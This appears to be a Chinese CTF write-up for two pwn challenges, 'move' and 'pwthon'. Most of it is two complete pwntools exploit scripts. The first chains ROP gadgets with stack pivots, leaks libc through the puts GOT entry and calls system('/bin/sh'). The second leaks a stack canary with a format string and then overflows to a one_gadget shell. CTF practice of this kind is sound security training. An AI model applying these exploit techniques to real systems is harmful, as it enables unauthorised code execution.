move
一眼栈溢出,然后三次栈迁移。
exp
from tools import* context(os='linux',arch='amd64',log_level='debug') p,e,libc=load("./pwn") pop_rdi=0x401353 ret=0x40101a bss=0x4050A0 leave_ret=0x40124b read=0x401230 pop_rbp=0x40119d payload=p64(pop_rbp)+p64(bss)+p64(read) p.recvuntil("lets travel again!\n") debug(p,0x40124B,0x4012D6) p.send(payload) p.recvuntil("Input your setp number") p.send('\x78\x56\x34\x12') payload=b"a"*0x26+b'bb'+p64(bss-8)*2+p64(leave_ret) p.send(payload) payload=p64(0x405070-8)+p64(pop_rdi)+p64(e.got['puts'])+p64(0x40125C )+p64(0x405070-8)+p64(read)+p64(0x405070)+p64(leave_ret) p.send(payload) libc_base=recv_libc()-0x80970 log_addr('libc_base') bin_sh=libc_base+0x1b3d88 system_addr=libc_base+0x4f420 payload=p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr)+p64(0xdeadbeef)*2+p64(0x405030)+p64(leave_ret) p.sendline(payload) p.interactive()pwthon
漏洞比较简单,就是格式化字符串,栈溢出,难的是第一次见这种题型,不知道怎么本地运行的,泄露canary查找溢出偏移都是远程完成的,直到查找libc麻瓜了,必须本地调试
这个本地调试的方法有以下几个点
1、必须是python3.7
2、使用sys.path.append("/home/zikh/Desktop/app.cpython-37m-x86_64-linux-gnu.so")去导入他给的库
3、使用gdb调试他给的库,在用attach调试进程
结合本地和远程泄露的libc地址发现libc就是我本地的环境
exp
from tools import* context.log_level = "debug" p=process(["python3.7","main.py"]) # p=remote('123.56.9.101',16674) p.sendlineafter('> ','0') p.sendline(b'%p.'*(0x20)) p.recv() data=p.recv() canary=data[-22:-4] libc_base=data[-79:-65]# log_info(canary) log_info(libc_base) canary=int(canary,16) libc_base=int(libc_base,16)-0x10fcdd log_addr('canary') log_addr('libc_base') p.sendline(b'a'*264+p64(canary)*2+p64(libc_base+0x4f2a5)) p.interactive()
